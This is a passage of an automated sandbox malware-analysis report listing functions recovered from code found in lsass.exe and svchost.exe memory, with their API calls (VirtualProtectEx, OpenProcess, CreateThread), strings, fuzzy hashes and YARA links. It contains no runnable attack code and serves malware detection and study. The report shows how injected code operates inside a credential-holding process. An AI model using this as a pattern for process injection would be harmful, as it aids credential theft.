GetModuleHandleW.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000140AE863A5B), ref: 00000140AE863F68

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 8a0e5b0f67ac1fd3911e5056b2041752d295a4b6fb88322e2f22780a5f38df01
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 0E112B36645B8093FB25AB22F40429AB7B0FB89BA4F240026DF4D037A4EB7DC954C7C5

Function 00000140AE868CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140AE868CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000140AE868D62
RtlUnwindEx.NTDLL ref: 00000140AE868DBC

Strings

csm, xrefs: 00000140AE868D49

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fb5645df35e5793d6f54a435d13ca8e0709b8659f49037beec15e52e7964ba14
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 0F51C232351B008AEB56CB17E444BAC7795F758BA8F648121DF5E477A8DB78CC41C781

Function 00000140AE86A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00000140AE86A75B
_CallSETranslator.LIBVCRUNTIME ref: 00000140AE86A7A7

Strings

RCC, xrefs: 00000140AE86A777
MOC, xrefs: 00000140AE86A76F

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: c3c23e5d1b0181fecbc540254143a6f72f2c96a49833f9bacf731b9653e35848
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1661AE72508BC485EB229F16E4407DAB7A0F789BA8F244215EFDC17BA9DB7CC590CB41

Function 00000140AE86AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140AE86AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000140AE86ABBC

Strings

csm, xrefs: 00000140AE86AC0E
csm, xrefs: 00000140AE86AAF6

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 50b6b12fb3c5c38d0d014a028751acb205327d0ac3488ffe82a985e9a0789cdd
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 09518E322807808BEB768F2795443A87BA5F359BA4F244156DF9D47BE5CB38CC50DB82

Function 00000140ADFC9EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140ADFC9ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00000140ADFC9FBC

Strings

csm, xrefs: 00000140ADFCA00E
csm, xrefs: 00000140ADFC9EF6

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b429d8d9711aa915d0cbba5ed322443bdaf93f6d3e30e52ad55a1ee148141c96
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: A751D1322607888BEB758F13A1443DA77A3FB58B85F284116DB8943BE5CB38D572E701

Function 00000140AE863950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 00000140AE863972
StrStrW.SHLWAPI ref: 00000140AE863990
StrToIntW.SHLWAPI ref: 00000140AE8639B7

Part of subcall function 00000140AE861A30: OpenProcess.KERNEL32 ref: 00000140AE861A56
Part of subcall function 00000140AE861A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000140AE861A74
Part of subcall function 00000140AE861A30: PathFindFileNameW.SHLWAPI ref: 00000140AE861A83
Part of subcall function 00000140AE861A30: lstrlenW.KERNEL32 ref: 00000140AE861A8F
Part of subcall function 00000140AE861A30: StrCpyW.SHLWAPI ref: 00000140AE861AA2
Part of subcall function 00000140AE861A30: CloseHandle.KERNEL32 ref: 00000140AE861AB0

Part of subcall function 00000140AE863F88: StrCmpNIW.SHLWAPI(?,?,?,00000140AE86272F), ref: 00000140AE863FA0

Strings

pid_, xrefs: 00000140AE863968

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 9347d474d0b91fa265e04d2213d3bbcfc5162b1de3d0b922ac8d9747152185f9
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 8F114F31394B8191EB129B26E8003DA62A4FB9C7A5FB440259F4D836B5EF78CD45C781

Function 00000140AE871FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000140AE872027
WriteFile.KERNEL32 ref: 00000140AE872304
WriteFile.KERNEL32 ref: 00000140AE87234A
GetLastError.KERNEL32 ref: 00000140AE872409

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: f44c40dc46d8a14717a7e28ec3dd61239b269cd74b9e3fc11d7840f94af7ebb8
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 2CD1F172754B8489E712CFAAD4403DC37B1F358BA8F604216DF5EA7BA9DA34C946C381

Function 00000140AE8614A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE8614C6
HeapFree.KERNEL32 ref: 00000140AE8614D5
GetProcessHeap.KERNEL32 ref: 00000140AE8614E2
HeapFree.KERNEL32 ref: 00000140AE8614F1
GetProcessHeap.KERNEL32 ref: 00000140AE861501

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: a7db99b5f4592933ab9d9fcefbd2ed102edd81d2e3ef44bf4708692969ef0819
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 9B016532650B80DAE715EF67E84428977A2FB8CFA1B294025DF4D43B28DF38D891C780

Function 00000140AE8728F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000140AE8728DF), ref: 00000140AE872A12

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 2e7cc4aa3ae94b300f4e6f0257f7cb7749ed6200f60573b19eace599f31e8f8f
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 2F9105B265075089FB62DF6B94507ED7BA0F35CBA8F740106DF4E53AA5DA34C885C382

Function 00000140AE868090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000140AE8680BC
GetCurrentThreadId.KERNEL32 ref: 00000140AE8680CA
GetCurrentProcessId.KERNEL32 ref: 00000140AE8680D6
QueryPerformanceCounter.KERNEL32 ref: 00000140AE8680E6

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 731bc0d5581eed0fb4cdda9989d7511de2973ec687fe859b23836854cee0570e
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 47111536790F048AEB00DB61E8653A833A4F71D768FA40E21EF6D877A4DB78C594C381

Function 00000140ADFC80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000140ADFC80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 00000140ADFC8162

Strings

csm, xrefs: 00000140ADFC8149

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 6dacf682604195edeba7ac8c828718cd55442e591f5eab81f157a09630ef0931
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 1651B232321B049BDB96CF17E448BEA3393FB48B98F2541259F46477A8D779D862D700

Function 00000140ADFC9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000140ADFC9BA7

Strings

RCC, xrefs: 00000140ADFC9B77
MOC, xrefs: 00000140ADFC9B6F

Memory Dump Source

Source File: 00000009.00000003.2361554206.00000140ADFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_3_140adfc0000_lsass.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 8fa38b0c882aa4e2cae7ad3da0de34cfcaff7e5919ca05456c99c896e0efe0af
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: CA61A272514BC882D772DF16E4407DBB7A2FB89B89F144215EBD817BA5DB78C1A1CB00

Function 00000140AE8625DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000140AE8626C2
StrCpyW.SHLWAPI ref: 00000140AE8626D9

Strings

\\.\pipe\, xrefs: 00000140AE8626CD

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 3c00e9618906587114cfc692b6afa461ad58df83ebc395dc250c9046a1c9e208
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 4851033628878085EA26DF2BA4547EAA751F38DBA0F740065CF4D47BB9DA39CC00C7C2

Function 00000140AE872660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000140AE872778
GetLastError.KERNEL32 ref: 00000140AE87279D

Strings

U, xrefs: 00000140AE872722

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 255177383648f2894fd213fbe0e6a3e54ca119f5ec3950ae9442bb96d1f83806
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: F341C572625B8086EB51DF2AE4447D9B7A0F35C7E4FA04122EF4D87B68EB38C841C781

Function 00000140AE869178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000140AE8691C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000140AE8687F7), ref: 00000140AE869209

Strings

csm, xrefs: 00000140AE8691F6

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 94200fb60f2d996550029215fd4c3d66a2994c5ef294e7576bee1024df5c8f56
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 8011FE32214B4082EB618B16F44429977E5FB88B94F784625EF8D07BA8DF3CC951CB40

Function 00000140AE861D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE861D69
HeapAlloc.KERNEL32 ref: 00000140AE861D77
GetProcessHeap.KERNEL32 ref: 00000140AE861D9C
HeapFree.KERNEL32 ref: 00000140AE861DAA

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: e0bc7f7aa60f32e668b10b12c28b3508dd04559eb20fa7f90dfc6dcf09de169f
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: D1115B21A51B8085EB16DB67A80429977A2FB8CFE1F684124DF8E53775EF38D842C380

Function 00000140AE861264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE86126A
HeapAlloc.KERNEL32 ref: 00000140AE861279
GetProcessHeap.KERNEL32 ref: 00000140AE861293
HeapAlloc.KERNEL32 ref: 00000140AE8612A4

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 5b7257912215da22affbcc8466b9813032a90c587412cbc9cb6543fde445ccf3
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 25E039316416049AE715AB63D84838936E2EB8CB26F648024CE0907360EF7D9899C7A1

Function 00000140AE861000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000140AE861006
HeapAlloc.KERNEL32 ref: 00000140AE861015
GetProcessHeap.KERNEL32 ref: 00000140AE861028
HeapAlloc.KERNEL32 ref: 00000140AE861037

Memory Dump Source

Source File: 00000009.00000002.3570034492.00000140AE861000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true

Associated: 00000009.00000002.3569233672.00000140AE860000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571007269.00000140AE875000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3571812569.00000140AE880000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3572616620.00000140AE882000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3573385410.00000140AE889000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_140ae860000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 6ab3dc22cfb29883a2d21ca8a70a6b2bde87891e4e8d1950b5fb491c92a906b3
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: A1E0ED716516049AE719AB63D84429977E2FF8CB26F648024CE0907720EE389899D661

Analysis Process: svchost.exePID: 924, Parent PID: 5068COMMON

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	120
Total number of Limit Nodes:	9

Executed Functions

Function 00000195DD5C1E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00000195DD5C1E7F

Part of subcall function 00000195DD5C22A8: GetModuleHandleA.KERNEL32(?,?,?,00000195DD5C1EB1), ref: 00000195DD5C22C0
Part of subcall function 00000195DD5C22A8: GetProcAddress.KERNEL32(?,?,?,00000195DD5C1EB1), ref: 00000195DD5C22D1

CreateThread.KERNELBASE ref: 00000195DD5C2043
TlsAlloc.KERNEL32 ref: 00000195DD5C2049
TlsAlloc.KERNEL32 ref: 00000195DD5C2055
TlsAlloc.KERNEL32 ref: 00000195DD5C2061
TlsAlloc.KERNEL32 ref: 00000195DD5C206D
TlsAlloc.KERNEL32 ref: 00000195DD5C2079
TlsAlloc.KERNEL32 ref: 00000195DD5C2085

Strings

